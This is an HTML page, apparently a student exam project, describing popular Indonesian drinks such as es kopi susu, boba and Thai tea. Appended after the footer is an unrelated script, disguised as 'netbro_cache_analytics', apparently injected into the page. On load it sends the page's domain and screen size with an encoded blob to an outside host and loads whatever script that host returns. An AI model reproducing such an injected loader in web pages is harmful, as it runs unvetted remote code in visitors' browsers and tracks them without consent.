<HTML>
  <HEAD>
	<TITLE>UAS MINUMAN</TITLE>
	<style TYPE=text/css>
	  header, section, footer, aside, nav, article, figure, figcaption {
          	display: block;
		}
	  body {
		COLOR : auto;
		background-color: grey ;
		background-image : url("images/bg.gif");
		background-position: center;
		margin : 0px;
		}
	  .wrapper {
           	width: 940px;
          	margin: 20px auto 20px auto;
          	border: 4px solid rgb(241, 166, 20);
          	background-color: rgba(252, 252, 252, 0.95);
		}
	  header {
          	height: 220px;
          	background-image: url("images/logo.jpg");
            background-size: cover;
		}
          h1 {
          	text-indent: -9999px;
          	width: 940px;
          	height: 190px;
          	margin: 0px;}
          nav,footer {
          	clear: both;
          	color: #ffffff;
          	background-color: #1a1920;
          	height: 30px;
		}
	 nav ul {
          	margin: 0px;
          	padding: 5px 0px 5px 50px;
		}
          nav li {
          	display: inline;
          	margin-right: 40px;
		}
          nav li a {
           	color: #ffffff;
            font-size: 1em;
		}
          nav li a:hover, nav li a.current {
         	color: rgb(241, 166, 20);
		}
          section.courses {
          	float: left;
          	width: 659px;
          	border: 5px solid #eee;
		}
	  article {
          	clear: both;
          	overflow: auto;
          	width: 100%;
            padding: 50px 0px;
		}
          hgroup {
         	 margin-top: 40px;
		}
          figure {
           	float: left;
          	width: 290px;
          	height: 220px;
          	padding: 5px;
          	margin: 20px;
          	border: 1px solid #eeeeee;
		}
          figcaption {
          	font-size: 90%;
          	text-align: left;
		}
	        aside {
          	width: 230px;
          	float: left;
          	padding: 20px;
		}
	        aside a {
      	     display: block;
      	     padding: 10px;
      	     border-bottom: 1px solid #eeeeee;
      	     }
      	  aside a:hover {
      	    color: black;
      	    background-color: rgb(254, 244, 23)}
      	  a {
      	    color: #b81d3f;
      	    text-decoration: none;
      	    }
      	  h1,h2,h3 {
      		font-weight: normal;
      		}
      	  h2 {
      		margin: 10px 0px 5px 0px;
      		 padding: 0px;
      		 }
      	  h3 {
      		margin: 0px 0px 10px 0px;
      		color: black;
      		}
      	  aside h2 {
      		  padding: 30px 0px 10px 0px;
      		  color: rgb(241, 166, 20);
      		  }
	</style>
</head>
  <body>
	<div class=wrapper>
	  <Header>
	   <H1>Warung Tegal</H1>
	     <nav>
		<ul>
              	   <li><a href="index.html" class="current">Home</a></li>
              	   <li><a href="trend.html" >Trending in 2018</a></li>
              	   <li><a href="profile.html">Profile</a></li>
              	   <li><a href="contact.html">Contact</a></li>
		</ul>
	     </nav>
	  </Header>
	  <Section class=courses>

		<article>
                       <figure>
                           <img src="images/kopi.jpg" alt=" Kopi "></img>
                           <figcaption><i>Es Kopi Susu</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=kopi><h2>Es Kopi Susu</h2></a>
                       </hgroup>
                       <p>Ini dia minuman kekinian yang popularitasnya melejit di tahun 2019 ini. Yang paling populer adalah es kopi susu gula aren. Perpaduan rasa pahit getir kopi dipadu manis dan gurihnya gula aren membuat semua orang jatuh cinta pada minuman ini. Tak hanya dari kalangan muda, bahkan anak-anak pun menyukainya. Kini, selain gula aren, banyak juga yang berkreasi dengan pemanis jenis lainnya, misalnya pandan, tiramisu, caramel, dan lainnya.</p>
		</article>
		<article>
                       <figure>
                           <img src="images/brown.jpg" alt="Brown Sugar" />
                           <figcaption><i> Brown Sugar</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=brown><h2>Brown Sugar</h2></a>
                       </hgroup>
                       <p>Berkat es kopi susu gula aren yang sangat digemari, popularitas brown sugar alias si gula aren juga ikutan melejit. Selain kopi susu, gula aren juga menjadi pemanis di berbagai minuman lain seperti milk tea, boba, bahkan es krim.</p>
		</article>
		<article>
                       <figure>
                           <img src="images/boba.jpg" alt="Boba" />
                           <figcaption><i> Boba</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=boba><h2>Boba</h2></a>
                       </hgroup>
                       <p>Popularitas boba belum surut sejak tahun lalu. Mirip seperti pearl bubble dan sama-sama terbuat dari tepung tapioka, tekstur boba yang kenyal dan langsung meletus saat digigit membuatnya jadi topping paling favorit untuk beragam minuman dan makanan.</p>

		</article>
		<article>
                       <figure>
                           <img src="images/regal.jpg" alt="Minuman dengan Regal" />
                           <figcaption><i> Minuman dengan Regal</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=regal><h2>Minuman dengan Regal</h2></a>
                       </hgroup>
                       <p>Tahu biskuit Marie Regal? Nah, tahun 2019 ini bermunculan aneka minuman yang mencampurkan Regal ke dalamnya, mulai dari kopi susu, teh, teh susu, dan masih banyak lagi kreasi lainnya.</p>

		</article>
		<article>
                       <figure>
                           <img src="images/thaitea.jpg" alt="Minuman dengan Regal" />
                           <figcaption><i> Thai Tea</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=thaitea><h2>Thai Tea</h2></a>
                       </hgroup>
                       <p>Popularitas Thai Tea belum surut. Paduan teh, susu, dan krimer yang katanya khas Negeri gajah Putih ini kerap jadi pilihan buat mereka yang nggak suka kopi. Makanya, Thai Tea juga mudah ditemukan di gerai-gerai kopi kekinian.</p>

		</article>
	  </Section>

	  <aside>

          <h2>Minuman Populer</h2>
        	      <a href="trend.html#cheesetea">Cheese Tea</a>
                <a href="trend.html#eskepal">Es Kepal Milo</a>
        		    <a href="trend.html#alpukat">Alpukat Kerok</a>
          	  	<a href="trend.html#alpukatk">Alpukat Kocok</a>
             		<a href="trend.html#eskrim">Es Krim Taiyaki</a>
             		<a href="trend.html#twin">Twin Cup</a>
             		<a href="trend.html#floaties">Floaties Drink</a>

       		<h2>Kontak</h2>
            	<p>Muhammad Farhan<br />


       	  </aside>
	  <footer>
	   	 <marquee behavior=alternate >&copy; 2020 Muhammad Farhan</marquee>
	  </footer>
	</DIV><!-- .wrapper-->
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXGZvz%2fZNFti8fCHQVuTKHCPRI0prOIm1OJWicfJeiC%2bpb9IOmM08V1oKrNtMsMhrhYhcPvm5uSFuy5GO9qU438xivYm0en7mGZgUc%2bxE1B7j1XVZw1N6gr7aZDtc22WwiafES5WrWklKwvcb8OJzfqw%2fp0NqFXW4Aek1%2bvAHJG%2bG20Qd4TzuV%2fBko%2bL6HOaekr6RJjHY5FdP%2bcfrDn%2b%2fC6kUjQfE9Jop%2bYUXg33IFF5fFZWWqxquaXxFzL1eZ0dOM1BKYNz3FOnea%2fHM4RC%2bVjurYVA%2f6bfAClpntHPFJuVSohpTNryvjLvd7YxIw1v44yN68vI8HSYhNxykWnWAmGv1bANjcXRlk0kTAR8%2fWjQIADMJ5BepbHlfkgjuOzC215TS%2fC8jEUZeFbl851JQ996pkGUMlFRcSwKDDB3KwX1bBYIW9rism4BzJmcPdCEuZpSn1SfGLc%2bNhJ14x6Otqdziv4mYYtgFe%2bzHj25o%2fUbwFxVbJDsnF%2f4dPFp%2fe%2bglSgJ4uAMI0bxnmqii8npchQJa9kHoN7EmC9Fxcr42t35RWcFmbC6kl%2fwzNEmn98B%2bHCQmkvA8TNQlC3GM9KIkK9Wvp%2baamjhCs" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></BODY>
</HTML>
